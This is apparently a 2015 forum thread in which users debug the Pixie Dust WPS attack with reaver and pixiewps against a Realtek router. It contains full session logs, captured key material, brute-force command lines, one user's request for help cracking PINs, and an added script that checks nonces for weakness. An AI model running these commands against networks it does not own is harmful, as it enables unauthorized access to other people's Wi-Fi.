    b) Continue, no risk no fun


  41. #41
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back until 1970,
    so if you can leave it running that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backwards.
    I was also thinking about an option that allows you to define a point in time.
    Let's say I choose 01-01-2012 00:00.
    Then the brute force would start from the defined time up to today's time and, if the PIN is not found, it would go from 01-01-2012 00:01 back to 1970 (like two sequences).
    That may be a bit weird and strange, but I thought it may be interesting.
    cheers

  42. #42
    Quote Originally Posted by kcdtv View Post
    We have more or less the same power (I said 600 but it can go to 800 when it goes full power) and to go back until 2012 it took more than 15 minutes...
    But wiire has been told that some Realtek chipsets could go back until 1970,
    so if you can leave it running that would be great.
    This chipset could be the one... it is not from the X project series, so it has a good chance.
    Thinking about pixiewps, maybe it would be a good idea to have just one try with seed 1970 at the beginning of the brute force and then start the brute force backwards.
    I was also thinking about an option that allows you to define a point in time.
    Let's say I choose 01-01-2012 00:00.
    Then the brute force would start from the defined time up to today's time and, if the PIN is not found, it would go from 01-01-2012 00:01 back to 1970 (like two sequences).
    That may be a bit weird and strange, but I thought it may be interesting.
    cheers
    Yes, now that pixiewps 1.1 is out we can collect data and decide how to optimize it best in a future release. As I said, I run it on my desktop PC, which takes only 20 minutes to exhaust the keyspace, so... yeah...

    If some of you get:

    "[!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data."

    But doesn't find the pin after the --force bruteforce (and your computer time is ok) let me know. I assumed that the router cannot have set time to future but... you never know...

  43. #43
    Quote Originally Posted by Saydamination View Post
    Hello , @Wiire @Kcdtv


    Chipset : Realtek RTL8671

    Computer : Test computer, proccessor 1.9 Ghz 1GB Ram .. ( 800 key/sec )

    Command : pixiewps -e -r -s -z -a -n -f

    I m waiting for 3 hours and Pixiewps is continiou...

    What can I do ? Suggestion?

    a ) Give up

    b) Continiou , No risk no fun

    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.

  44. #44
    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Hello Wiire,

    Test finished... I'm not lucky...

    Reaver Results:

    Code:
    Associated with 90:F6:52:xX:xX:BX (ESSID: x)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Name: RTL8671
    [P] WPS Model Number: EV-2006-07-27
    [P] Access Point Serial Number: 123456789012347
    [+] Received M1 message
    [P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
    [P] PKR: d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73
    [P] AuthKey: ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a
    [+] Sending M2 message
    [P] E-Hash1: 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c
    [P] E-Hash2: f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be
    [Pixie-Dust]  
    [Pixie-Dust]   Pixiewps 1.1
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 13 s
    [Pixie-Dust]  
    [Pixie-Dust]   [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
    [Pixie-Dust]
    Pixiewps Results:

    Code:
    pixiewps -f -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r d7:16:e1:10:56:09:4f:97:da:f3:85:7e:72:61:b5:53:4e:e9:f0:80:85:06:7f:48:03:6b:69:07:60:aa:5d:ea:e4:48:3d:ba:47:2d:38:8e:f6:d9:b0:13:3a:c4:52:af:90:ef:10:cd:e0:15:84:5b:d7:38:f7:37:cc:2b:56:81:05:7a:d8:d2:6d:2e:8e:fb:d9:bb:05:7b:6e:c9:72:1f:f3:46:45:83:3f:f3:80:fc:bb:b1:c0:e4:25:01:17:25:06:0b:cf:2e:8b:8b:2a:d1:7f:fd:f9:a6:b4:b8:f4:aa:6b:09:78:24:4c:dd:31:20:ca:66:2f:ee:81:ff:4e:1b:e8:cf:a6:83:67:59:f3:d3:04:63:07:05:bd:2e:85:06:13:7e:60:83:a9:95:96:17:46:a4:e3:d3:6e:c6:8c:9f:bd:73:6c:cb:84:65:cd:b7:b2:40:4f:be:61:7f:5c:a7:d7:53:d9:19:31:59:66:19:69:0b:67:f3:9e:04:88:73 -s 3b:a6:4b:08:ef:72:22:75:c5:67:0e:ad:92:a2:c7:c2:69:05:f0:a0:26:76:10:96:56:a4:b7:bb:1d:b9:bf:6c -z f1:59:02:d1:34:5f:1e:95:0e:e3:9f:90:50:f8:12:00:18:e9:ec:d4:2f:f5:fc:fb:0b:37:0a:1b:6b:14:34:be -a ed:55:d2:0e:e3:f4:93:89:ab:80:b0:71:21:3f:1b:6f:2c:db:1a:8e:43:ad:f7:da:d2:e2:9f:ba:fe:81:e6:8a -n 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 27220 s
    Pin:12345670
    Last edited by Saydamination; 2015-05-16 at 21:08. Reason: Add pin

  45. #45
    Quote Originally Posted by Saydamination View Post
    Hello Wiire,

    Test finished... I'm not lucky..

    Code:
    [P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
    There's something utterly strange in that nonce. Try to capture a session with Wireshark and see if it matches the nonce reaver prints you.
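
The oddity wiire points at is visible in the nonce itself: read as four 32-bit words, every word starts with 00:00. Below is an added example (not part of the thread, not from pixiewps or reaver) that parses reaver's "[P] E-Nonce" / "[P] R-Nonce" lines and reports that kind of fixed-position structure, so the owner of an AP can check whether its WPS nonces look like they came from a narrow or poorly seeded generator before trusting the result. The log text is the two lines quoted in this thread; the 32-bit word width and the distinct-byte threshold are my assumptions.

```python
import re

# Constructed input: the two nonce lines reaver printed earlier in this thread.
REAVER_LOG = """\
[P] E-Nonce: 00:00:42:b4:00:00:6a:2e:00:00:07:80:00:00:43:45
[P] R-Nonce: ec:c4:f2:77:36:3c:fe:00:60:13:b8:2d:bc:ba:68:82
"""

# reaver prints the 128-bit nonces as 16 colon-separated hex bytes
NONCE_RE = re.compile(r"\[P\] (E-Nonce|R-Nonce): ((?:[0-9a-fA-F]{2}:){15}[0-9a-fA-F]{2})")


def parse_nonces(log: str) -> dict:
    """Return {'E-Nonce': bytes, 'R-Nonce': bytes} for the nonces found in reaver output."""
    found = {}
    for m in NONCE_RE.finditer(log):
        found[m.group(1)] = bytes.fromhex(m.group(2).replace(":", ""))
    return found


def zero_columns(nonce: bytes, width: int = 4) -> list:
    """Split the nonce into fixed-width words (assumed 32-bit) and report, for each
    byte position inside a word, whether that byte is zero in every word.
    [True, True, False, False] means the high half of every word is always zero."""
    words = [nonce[i:i + width] for i in range(0, len(nonce), width)]
    return [all(w[pos] == 0 for w in words) for pos in range(width)]


def assess_nonce(nonce: bytes) -> dict:
    """Flag a nonce as suspicious if some word column is always zero or the
    16 bytes repeat heavily (threshold of 8 distinct bytes is an assumption)."""
    cols = zero_columns(nonce)
    distinct = len(set(nonce))
    return {
        "zero_columns": cols,
        "distinct_bytes": distinct,
        "suspicious": any(cols) or distinct < 8,
    }


if __name__ == "__main__":
    for name, nonce in parse_nonces(REAVER_LOG).items():
        print(name, nonce.hex(), assess_nonce(nonce))
```

A clean nonce should show no always-zero column; the thread's E-Nonce shows two, which is the pattern wiire suggests confirming against a Wireshark capture rather than reaver's print-out alone.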

  46. #46
    Join Date
    2015-Feb
    Posts
    4

    Pixiewps not getting Hash File

    Quote Originally Posted by wiire View Post
    3 hours...?

    I can give it a go if you want. It takes at most 20 minutes on my PC. Send me your data via email or post it here. Of course I assume the router you're testing is yours.
    Dear Wiire,
    I am not getting an error: Pixiewps not getting Hash File

    I only get E-Nonce, PKE, R-Nonce, PKR and AuthKey, no hash.

    Please guide me further so that I can crack pins and passphrase.

    Thanks in advance
    jenisbob

  47. #47
    Hello @Kcdtv and Wiire,

    Many thanks for the comment and suggestion... you're absolutely right... Your idea about the option is great..

    I'm really wondering what would happen with it... So I want to wait until the test ends.

    I will come back with the test results..

    Cheers..
    Last edited by Saydamination; 2015-05-02 at 15:42. Reason: Add Ok..

  48. #48
    You are right Wiire.. This router is different.. I think there is some protection..

    I will try other options...

    This is Wireshark screen:

    http://imgur.com/IkpSn7C

  49. #49
    Code:
    root@bt:~# pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b -r 8c:da:44:e4:bf:e5:e4:a5:72:1e:c2:8e:8e:a4:c9:1f:28:16:95:f3:b8:fd:2c:9a:ad:5d:27:51:38:25:5d:cf:1f:25:35:65:99:f5:a3:1f:bc:c2:ff:59:45:3f:8d:a6:9a:72:c6:9d:1c:de:c9:2f:5e:e4:4f:f4:7a:7c:53:50:c7:da:d4:50:37:b5:a0:1d:bb:8c:a5:35:fc:b5:cd:2b:22:3b:5e:2e:23:51:10:bc:8e:7e:c3:bd:65:3d:35:dd:5c:c6:83:ef:69:0d:6d:e7:d7:b2:e1:98:c7:53:0b:50:ce:3a:dd:66:42:6b:0f:34:50:13:f1:71:0e:3c:f1:ab:a6:0d:23:22:08:f5:b1:7c:b2:dd:c5:b6:91:c6:fe:d6:ca:fe:e0:7b:ed:22:90:3c:06:d3:9c:ae:b7:77:79:ca:2a:cc:42:ac:3f:07:0b:73:69:31:7c:f9:69:ea:24:69:d1:4e:f3:b1:cf:bb:22:76:60:3f:11:8a:91:46:ba:a7 -s 2c:ed:7a:66:54:84:55:80:ae:28:52:78:7a:bb:41:a8:37:42:bf:fc:cf:2e:cd:4d:53:86:06:0c:0b:79:85:19 -z 8a:d4:8e:83:e0:00:34:99:78:c5:2b:92:11:ff:f6:ae:18:1f:15:1a:da:f7:5d:41:44:8f:ef:00:26:75:38:0a -a db:a5:68:39:87:53:fa:7a:1c:2a:ce:3f:f9:c8:5d:de:8b:63:e8:c6:b8:97:18:04:30:3a:90:7a:1f:aa:20:80 -n 45:7b:18:6c:14:80:7e:17:7f:d6:22:84:43:74:49:ad -f 
    
     Pixiewps 1.1
    
     [-] WPS pin not found!
    [*] Time taken: 16902 s
    
    root@bt:~#
    Last edited by Saydamination; 2015-05-04 at 19:18.

  50. #50
    Apparently you are too far from the router to communicate properly with it.

    Try to get closer to the router.
